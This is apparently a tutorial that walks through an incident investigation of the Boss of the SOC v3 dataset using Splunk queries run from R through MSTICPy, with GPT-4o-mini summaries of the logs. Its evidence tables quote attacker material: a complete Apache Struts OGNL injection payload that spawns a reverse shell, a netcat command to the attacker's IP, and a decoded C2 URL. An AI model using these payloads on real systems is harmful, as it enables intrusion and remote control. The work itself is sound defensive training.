pacman::p_load(tidyverse, reticulate)
mp <- import("msticpy")
qry_splunk <- mp$QueryProvider("Splunk")
qry_splunk$connect()Credential loading from msticpyconfig.yaml file.
username/password method is selected.
Connected.
This article documents an example approach for conducting log investigations using Splunk. As a demonstration, it utilizes the publicly available Boss of the SOC v3 dataset, indexed under the name botsv3.
Before beginning the investigation, we verify whether we can retrieve data via the Splunk API. To do this, we use MSTICPy, a Python module provided by Microsoft, as a wrapper. Since I’m an R user, I will access MSTICPy through the Reticulate package in R.
pacman::p_load(tidyverse, reticulate)
mp <- import("msticpy")
qry_splunk <- mp$QueryProvider("Splunk")
qry_splunk$connect()Credential loading from msticpyconfig.yaml file.
username/password method is selected.
Connected.
The connection was successful.
Next, let’s send a basic query to a built-in dataset and print the result as a data frame.
MSTICPy automatically converts table results into Pandas DataFrames, which can be handled natively in R via Reticulate.
spl <- r"(
| inputlookup security_example_data.csv
| table timestamp threat_src_ip threat_dest_ip threat_status threat_type
| head 5
)"
df_1st <- qry_splunk$exec_query(spl, timeout=300)
df_1stThe query result is successfully displayed as a data frame. Note that all field types returned via the Splunk API are strings—this is a known Splunk-side limitation.
With everything working, we can now move on to the actual investigation.
# Distinguish Markdown strings output by AI from body text
ai_out <- function(x){
ai_block <- paste0(
"::: {.callout-tip title='AI output'}\n\n",
x,
"\n\n:::"
)
ai_block |> knitr::asis_output()
}
# Create interactive tables
pacman::p_load(DT)
create_dt <- function(x){
DT::datatable(
x,
filter = 'top',
options = list(
autoWidth = TRUE,
scrollX = TRUE,
scrollY = "400px",
dom = 'Blfrtip',
buttons = c('copy', 'csv', 'excel', 'pdf', 'print')
),
extensions = 'Buttons',
)
}At this point, we have no prior knowledge of what types of events are recorded in the dataset. (While the official site lists sourcetypes, that’s all.)
We begin by listing host and sourcetype fields, along with event counts and the timestamps for first and last appearances. These initial insights may offer a foundation for further analysis.
spl <- r"(
search index=botsv3 earliest=0
| stats count, earliest(_time) as first_seen,
latest(_time) as last_seen by host, sourcetype
)"
df_host <- qry_splunk$exec_query(spl, timeout=300)
df_host_m <-
df_host |>
as_tibble() |>
mutate(
count = as.integer(count),
first_seen = as.double(first_seen) |> as_datetime(tz = "UTC"),
last_seen = as.double(last_seen) |> as_datetime(tz = "UTC")
)
create_dt(df_host_m)There are about 30 unique hosts in the dataset. For example, those whose names end with “-L” are likely Windows workstations. To explore this kind of pattern more thoroughly, we can let OpenAI suggest possible interpretations.
csv_host <-
df_host_m |>
select(host, sourcetype) |>
format_csv()
q_ai <- str_c(
"Please classify the following data based on the pattern of the host field.
If the sourcetype field suggests the type of operating system or environment,
include that information as well. Output one line per host in the format:
[Category], [Host Name], [Additional Information]
If the category is unclear, label it as Unknown.",
"Data:\n",
csv_host)
pacman::p_load(ellmer)
chat <- chat_openai(model = "gpt-4o-mini")
ans <- chat$chat(q_ai, echo = "none")
ai_out(ans)Here is the classified data based on the specified criteria:
Windows, ABUNGST-L, Windows
Windows, BGIST-L, Windows
Windows, BSTOLL-L, Windows
Windows, BTUN-L, Windows
Firewall, FROTHLY-FW1, Cisco ASA
Windows, FYODOR-L, Windows
Windows, JWORTOS-L, Windows
Windows, MKRAEUS-L, Windows
Unknown, OD-FM-NA-i-0ad2d665d4bdace22.amazonaws.com, Unknown
Windows, PCERF-L, Windows
Windows, SEPM, Symantec Endpoint Protection
Unknown, console.us.code42.com:443, Unknown
Unix, gacrux.i-06fea586f3d3c8ce8, Unix
Unix, gacrux.i-0920036c8ca91e501, Unix
Unix, gacrux.i-09cbc261e84259b54, Unix
Unix, gacrux.i-0cc93bade2b3cba63, Unix
Unix, hoth, Unix
Unknown, ip-172-16-0-109.ec2.internal, Unknown
Unknown, ip-172-16-0-127, Unknown
Unknown, ip-172-16-0-13, Unknown
Unknown, ip-172-16-0-145, Unknown
Unknown, ip-172-16-0-178, Unknown
Unknown, ip-172-31-12-76, Unknown
Unknown, ip-172-31-36-235, Unknown
Unix, mars.i-08e52f8b5a034012d, Unix
Unknown, matar, Unknown
Unknown, ntesla, Unknown
Unknown, serverless, AWS
Unknown, splunk.froth.ly, AWS
Unknown, splunkhwf.froth.ly, Unknown
This output provides a clear categorization based on the host names and their respective information derived from the sourcetype field. Each line follows the given format of [Category], [Host Name], [Additional Information].
ans <- chat$chat("What kind of data is associated with the host named splunk.froth.ly?",
echo = "none")
ai_out(ans)The host named splunk.froth.ly is associated with the following types of data:
This variety of data types suggests that the host is utilized for monitoring and logging activities across multiple AWS and Microsoft services.
This gave us sufficient insight into the host and sourcetype fields, so we can now move on to the next step of the investigation.
To examine user behavior, we start with sign-in logs. The sourcetype ms:aad:signin contains entries related to Azure Active Directory sign-ins. We can look at the types of sign-ins, how often they occur, and who performed them.
As a first step, we take a summary to check which fields might be useful for analysis.
spl <- r"(
search index=botsv3 earliest=0
sourcetype="ms:aad:signin"
| fieldsummary
)"
df_aadsignin_sum <- qry_splunk$exec_query(spl, timeout=300)
create_dt(df_aadsignin_sum)There are two versions of the API used to retrieve Azure AD sign-in logs: version 1.0 and Beta. It appears that version 1.0 is used here, which provides a limited set of fields. For instance, we would at least like to know the Autonomous System Number (ASN) of the source IP address, but that information is not included.
Since this Splunk environment does not have an enrichment app installed, we prepare to perform enrichment manually using an external service such as ip-api.
pacman::p_load(httr2)
get_asn <- function(ip) {
url <- str_glue("http://ip-api.com/json/{ip}?fields=as")
resp <- tryCatch(
request(url) |> req_throttle(rate = 4/10) |>
req_perform() |> resp_body_json(),
error = function(e) return(list(as = NA))
)
resp$as
}
spl <- r"(
search index=botsv3 earliest=0
sourcetype="ms:aad:signin"
| fields src_ip
| dedup src_ip
| table src_ip
| sort 0 src_ip
)"
df_src <- qry_splunk$exec_query(spl, timeout=300)
df_src_enriched <-
df_src |>
mutate(asn = map_chr(src_ip, get_asn)) |>
mutate(asn = if_else(asn == "", "--", asn))
df_src_enrichedAt this point, it seems that some IP addresses still cannot be resolved to ASNs.
To further investigate sign-in behavior by src_ip, we can use the values() function to gather unique values per IP address. As this function returns multi-value fields, they appear as lists in data frames obtained via the API. We must unnest these lists to access individual elements.
spl <- r"(
search index=botsv3 earliest=0
sourcetype="ms:aad:signin"
| table _time, app, user, src_ip, location.country, loginStatus, deviceInformation
| stats values(*), earliest(_time) as first_seen, latest(_time) as last_seen by src_ip
)"
df_aadsignin <- qry_splunk$exec_query(spl, timeout=300)
df_aad_enriched <-
df_aadsignin |>
mutate(
first_seen = as.double(first_seen) |> as_datetime(tz = "UTC"),
last_seen = as.double(last_seen) |> as_datetime(tz = "UTC")
) |>
janitor::clean_names() |>
mutate(across(
starts_with("values_"),
~ map_chr(.x, ~ str_c(.x, collapse = " | "))
)) |>
rename_with(~ str_remove(.x, "^values_"), starts_with("values_")) |>
inner_join(df_src_enriched, by = "src_ip") |>
select(src_ip, location_country, first_seen, last_seen, asn, user, device_information, login_status, app)
create_dt(df_aad_enriched)The first row in our summary highlights src_ip = 104.207.83.63 (located in Hong Kong), which is worth closer attention. According to the device_information field, this IP is uniquely associated with Windows 7, and shows an unusual string: aBrowswer 3.5.
Also notable are src_ip = 157.97.121.132 and src_ip = 199.66.91.253, each of which is used to sign in by two different users. Altogether, these three IP addresses are associated with four accounts: bgist, fyodor, bstoll, and klagerfield.
Let’s examine the sign-in histories of these users in more detail.
spl <- r"(
search index=botsv3 earliest=0
sourcetype="ms:aad:signin"
src_ip IN ("104.207.83.63", "157.97.121.132", "199.66.91.253")
| table _time, app, user, src_ip, location.country, loginStatus, deviceInformation
| sort_time
)"
df_aadsignin2 <- qry_splunk$exec_query(spl, timeout=300)
df_aadsignin2 <-
df_aadsignin2 |>
janitor::clean_names() |>
mutate(time = as_datetime(time))
create_dt(df_aadsignin2)In the sign-in log, we observed events from suspicious IP addresses where the app was listed as Exchange Online. This raises the possibility of unauthorized email activity, prompting us to examine the Message Trace Logs.
The sourcetype ms:o365:reporting:messagetrace provides detailed information about email transmission. We’ll investigate who is sending what, and to whom.
spl <- r"(
search index=botsv3 earliest=0
sourcetype="ms:o365:reporting:messagetrace"
src IN ("104.207.83.63", "157.97.121.132", "199.66.91.253")
| table _time, size, src, orig_src, orig_recipient, subject, action, MessageTraceId
| sort _time
)"
df_msgt <- qry_splunk$exec_query(spl, timeout=300)
df_msgt <-
df_msgt |>
as_tibble() |>
janitor::clean_names() |>
mutate(time = as_datetime(time))
create_dt(df_msgt)This helps us understand message flow and detect any suspicious communications.
The account bgist appears to have sent emails to other internal users. Among the two types of subjects observed, the first—“Draft Financial Plan for Brewery FY2019”—was initially quarantined, suggesting the message may have included an attachment based on its size. When the message was delivered a second time, the size had noticeably decreased, implying that the attacker might have switched to a link-based tactic instead of using an attachment.
Unified audit logs can be queried via the sourcetype o365:management:activity. Here, we extract events related to the three suspicious IP addresses mentioned earlier to investigate what actions were taken and by whom.
spl <- r"(
search index=botsv3 earliest=0
sourcetype="o365:management:activity"
("104.207.83.63" OR "157.97.121.132" OR "199.66.91.253")
| table _time, src, action, command, authentication_service, file_name, record_type, user_id, user_agent
| sort _time
)"
df_ual <- qry_splunk$exec_query(spl, timeout=300)
df_ual <-
df_ual |>
as_tibble() |>
janitor::clean_names() |>
mutate(time = as_datetime(time))
create_dt(df_ual)Several findings are noteworthy:
user_agent field for IP address 104.207.83.63 includes the string ko-KP, which may suggest a North Korean locale.fyodor downloaded a file named archive.tar from IP 199.66.91.253.fyodor, indicated by the ExchangeAdmin record type.Using the three key log sources—sign-in logs, message trace logs, and unified audit logs—we now visualize activity involving the two most suspicious IP addresses (104.207.83.63 and 199.66.91.253) by plotting user and src_ip together.
pacman::p_load(scales)
df_msgt_pr <-
df_msgt |>
janitor::clean_names() |>
select(time, src, orig_src) |>
rename(user = orig_src, src_ip = src) |>
mutate(
time = as_datetime(time, tz = "UTC"),
log_src = "message"
)
df_aad_pr <-
df_aadsignin2 |>
janitor::clean_names() |>
filter(src_ip %in% c("104.207.83.63", "199.66.91.253")) |>
select(time, src_ip, user) |>
mutate(
time = as_datetime(time, tz = "UTC"),
log_src = "aad"
)
df_ual_pr <-
df_ual |>
janitor::clean_names() |>
rename(user = user_id) |>
mutate(
time = as_datetime(time, tz = "UTC"),
src_ip = str_split_i(src, ":", 1),
log_src = "ual"
) |>
select(time, user, src_ip, log_src)
df_m365_tmp <-
df_aad_pr |>
bind_rows(df_msgt_pr) |>
bind_rows(df_ual_pr)
p_m365 <-
df_m365_tmp |>
group_by(user) |>
mutate(first_seen = min(time)) |>
ungroup() |>
ggplot(mapping = aes(x = time, y = reorder(user, desc(first_seen)),
shape = src_ip, color = log_src)) +
geom_point(alpha = 0.4, size = 2) +
scale_x_datetime(breaks = breaks_width("30 min"),
minor_breaks = breaks_width("5 min"),
labels = label_time("%H:%M")) +
labs(x = "2018-08-20 (UTC)", y = "")
p_m365
A file named archive.tar appears multiple times in the logs. We extract related events and examine them for suspicious behavior.
spl <- r"(
search index=botsv3 earliest=0
sourcetype=xmlwineventlog TERM(archive.tar)
| table _raw
)"
df_archive <- qry_splunk$exec_query(spl, timeout=300)
str_archive <- df_archive |> flatten_chr()
df_archiveThis file was captured and logged in Sysmon. Instead of manually parsing the XML entries for details, we leverage OpenAI to extract key information from the event data directly.
q_ai <- str_c(
"I am investigating a possible security breach and have confirmed that the
file archive.tar was downloaded.
Does this XML event data indicate that archive.tar was generated or related to that activity? ",
"Data: \n",
str_archive)
chat <- chat_openai(model = "gpt-4o-mini")
ans <- chat$chat(q_ai, echo = "none")
ai_out(ans)The XML event data you provided indicates that the file archive.tar was indeed generated as part of a command executed on the system. Here are the relevant details extracted from the event data:
Process Information: The event describes a process running tar.exe, which is a utility often used for archiving files.
C:\Windows\system32\tar.exe -cvzf archive.tar *. This indicates that the tar command was run with the options:
-c: create a new archive-v: verbose output (show progress in the terminal)-z: compress the archive using gzip-f archive.tar: specify the name of the output fileCurrent Directory: The command was executed from the directory C:\Users\FyodorMalteskesko\OneDrive - Frothly\.
User Context: The command was executed by the NT AUTHORITY\SYSTEM user, which indicates it ran with elevated privileges.
Parent Process: The parent process that started this command was powershell.exe, which indicates that a PowerShell script or command initiated the tar command.
Timestamp: The event occurred on 2018-08-20T11:52:16.678737700Z, which is critical for tracking the timeline of potential malicious activity.
Based on the provided data, it is evident that the archive.tar file was generated as part of a command that executed the tar archiving tool. If you are investigating a security breach, this event could be significant. You should consider investigating the context and purpose of the command, especially the usage of PowerShell, as it is often utilized for various legitimate and malicious purposes. Moreover, checking for potential unauthorized access or additional suspicious behavior surrounding this event would be prudent.
Given that the parent process was PowerShell, we suspect the possibility of remote control. To investigate further, we search the Windows Event Logs on the host FYODOR-L for any entries containing the keyword FromBase64String.
spl <- r"(
search index=botsv3 earliest=0
sourcetype=WinEventLog
host="FYODOR-L" FromBase64String
| table _raw
)"
df_fydorl_base64 <- qry_splunk$exec_query(spl, timeout=300)
str_fydorl_base64 <- df_fydorl_base64 |> flatten_chr()
q_ai <- str_c(
"On the endpoint FYODOR-L, I searched Windows event logs for entries containing
the keyword FromBase64String and obtained the following data.
Please summarize what this data indicates, and extract any potentially useful
indicators of compromise (IOCs), such as IP addresses or suspicious keywords. ",
"Data: \n",
str_fydorl_base64)
chat <- chat_openai(model = "gpt-4o-mini")
ans <- chat$chat(q_ai, echo = "none")
ai_out(ans)Based on the Windows Event Logs retrieved from the endpoint FYODOR-L, there are multiple instances of suspicious PowerShell activity, specifically involving the use of the FromBase64String method, which is commonly associated with obfuscating malicious code.
Execution of Obfuscated PowerShell Scripts: The logs reveal a series of PowerShell commands that manipulate group policy settings related to script block logging. This suggests an attempt to disable security features that would normally log script activity, making it easier for malicious activities to occur without detection.
Malware Communication: Several script blocks appear to set up a WebClient object that potentially communicates with a remote server to download data or execute commands, highlighted by lines of code that set user agents and include requests to paths like /news.php and /login/process.php. This behavior is characteristic of Command and Control (C2) communication.
Base64 Encoded Strings: The scripts contain Base64 encoded strings, which are being decoded and executed, indicating that the commands are intentionally obscured to evade detection.
Scheduled Tasks: Multiple logs indicate that tasks are being created with PowerShell commands scheduled to execute at specific intervals, which is a technique often used by persistent malware to maintain control over the infected system.
Unusual User Agents: The usage of non-standard user agents in the HTTP requests suggests attempts to evade security measures or mimic legitimate traffic.
Command Line Strings:
IEX (Invoke-Expression) alongside Base64 strings is concerning.Obfuscated Keywords: Keywords like EnableScriptBlockLogging=0, SetValue($null, Expect100Continue=0, and ServerCertificateValidationCallback suggest manipulation of security features.
Scripts that Disable Security:
URLs:
/news.php/login/process.php/admin/get.phpUser Agent:
Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko - this typical user agent is used in many web requests and could be used to discern legitimate from malicious requests based on traffic analysis.Process Creation:
FromBase64String and IEX.Unfortunately, OpenAI sometimes fails to extract the correct IP address from the event logs. While a one-byte difference may seem minor to a language model, it can make a significant difference when identifying indicators of compromise (IOCs).
Note that depending on how the model is compiled, OpenAI may sometimes extract the correct IP address. This highlights that its output is not always stable or consistent.
b64str <- "aAB0AHQAcABzADoALwAvADQANQAuADcANwAuADUAMwAuADEANwA2ADoANAA0ADMA"
rawstr <- jsonlite::base64_dec(b64str)
raw_clean <- rawstr[rawstr != as.raw(0x00)]
rawToChar(raw_clean)[1] "https://45.77.53.176:443"
IP address 45.77.53.176 appears across several entries. We investigate its connections and the context of its appearance.
spl <- r"(
search index=botsv3 earliest=0
TERM(45.77.53.176)
| stats count by host
| sort 0 -count
)"
df_host_45 <- qry_splunk$exec_query(spl, timeout=300)
df_host_45Some hosts—such as splunkhfw and SEPM—seem to use it in a logging context, but others, including FYODOR-L and ABUNGST-L, appear to be communicating with this IP in what looks like potential command-and-control (C2) beaconing activity. The roles of hoth and matar remain unclear.
In a previous example, although the port number was 443, the protocol used was HTTP. This prompts us to check the stream:http sourcetype as well. Below, we display just the first matching entry.
spl <- r"(
search index=botsv3 earliest=0
TERM(45.77.53.176)
sourcetype="stream:http"
| head 1
| table *
)"
df_http_45 <- qry_splunk$exec_query(spl, timeout=300)
df_http_45 |>
janitor::clean_names() |>
select(time, src_ip, dest_ip, dest_port, uri_path, http_method, http_user_agent, form_data) |>
pivot_longer(everything(), names_to = "field", values_to = "value") |>
knitr::kable()| field | value |
|---|---|
| time | 2018-08-20T11:34:01.509+00:00 |
| src_ip | 192.168.8.103 |
| dest_ip | 192.168.9.30 |
| dest_port | 8080 |
| uri_path | /frothlyinventory/integration/saveGangster.action |
| http_method | POST |
| http_user_agent | python-requests/2.18.4 |
| form_data | age=1&__checkbox_bustedBefore=true&name=${(#szgx=‘multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=‘/bin/sh 0/tmp/backpipe’).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,‘/c’,#cmd}:{‘/bin/bash’,‘-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.close())}&description=1 |
From the observed traffic, it appears that a reverse shell was being attempted against 45.77.53.176 by exploiting an Apache Struts vulnerability. Evidence from OSQuery logs suggests that this attempt was successful.
spl <- r"(
search index=botsv3 earliest=0
host=hoth sourcetype="osquery:results"
"45.77.53.176"
| head 1
| fields - _raw, date*, ssl*
| table *
)"
df_osq_45 <- qry_splunk$exec_query(spl, timeout=300)
df_osq_45 |>
as_tibble() |>
janitor::clean_names() |>
select(time, action, columns_cmdline, columns_owner_uid, columns_path, columns_pid, columns_parent) |>
rename_with(~ str_remove(.x, "^columns_"), starts_with("columns_")) |>
pivot_longer(everything(), names_to = "field", values_to = "value") |>
knitr::kable()| field | value |
|---|---|
| time | 2018-08-20T11:34:49.000+00:00 |
| action | added |
| cmdline | “nc” “45.77.53.176” “8088” |
| owner_uid | 0 |
| path | /bin/nc.traditional |
| pid | 17211 |
| parent |
(To Be Continued…)
This walkthrough showcased how to approach an incident investigation using Splunk, MSTICPy, and R.
I call this kind of writing—where thoughts, code, and results are integrated into a cohesive narrative—“literary log analysis.” The idea was inspired years ago by Masaru Nagaku’s talk on “literary computing”, and I’ve long wanted to apply the concept to log analysis. In recent years, key tools like MSTICPy and Quarto have made this approach not only feasible but also accessible.
One advantage of performing the analysis in an RStudio Server environment is the flexibility to work with data sources beyond Splunk—such as Microsoft Sentinel, Elasticsearch, or even plain text files. Moreover, Quarto supports execution of both Python and Bash code chunks, which means you can preprocess JSON with jq and then convert the results back into a data frame.
By querying various log sources—from sign-ins to email and IP traffic—we were able to piece together behavioral patterns and indicators of compromise. The Boss of the SOC dataset provides a rich environment for practicing realistic threat hunting and log analysis skills.
Notes and Considerations:
Not every log analysis task needs to be conducted in a literary style. This approach can be time-consuming, so it’s best to apply it to investigations that warrant thorough documentation or future reference.
Even when using a markdown-based workflow, it’s important not to rely solely on that format. Personally, I also use web consoles, R scripts, and—perhaps most importantly—hand-drawn sketches and notebooks to clarify my thinking.
When dealing with large volumes of search results (such as long time ranges), it may be more efficient to export the results as a CSV file and then load it into a data frame, bypassing MSTICPy entirely.